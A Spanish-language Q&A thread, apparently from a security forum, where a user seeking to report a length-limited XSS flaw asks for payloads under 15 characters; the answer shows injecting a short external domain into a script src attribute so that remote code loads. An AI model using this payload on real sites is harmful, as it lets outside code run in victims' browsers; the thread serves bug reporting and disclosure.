15 caracteres o menor carga XSS

1

Encontré una vulnerabilidad XSS en un sitio grande, y quiero reportarlo, pero el único límite a la vulnerabilidad es que solo permite 15 caracteres como máximo. Esto obviamente tiene límites a las cargas útiles que puede ejecutar.

¿Alguien sabe algunas cargas útiles interesantes de 15 caracteres o menos y demuestra la vulnerabilidad para reportarlo?

    
pregunta Jack 22.12.2016 - 04:27
fuente

1 respuesta

1

Brutelogic escribió un artículo brillante sobre esto en enlace Hace algún tiempo.

Una de las ideas del artículo (parafraseado):

.. Es posible que un parámetro de URL se haga eco en una fuente de un script:

<script src=“INPUT”></script>

Podemos usar esto para lanzar un ataque XSS completo que proporcione una fuente con un dominio corto como //14.rs (7 caracteres de longitud). Una variación reduce la inyección a solo 5 caracteres si las barras diagonales dobles ya están en código nativo:

<script src=“//INPUT”></script>

# <script src=“//14.rs”></script>

    
respondido por el thel3l 22.12.2016 - 04:47
fuente

Lea otras preguntas en las etiquetas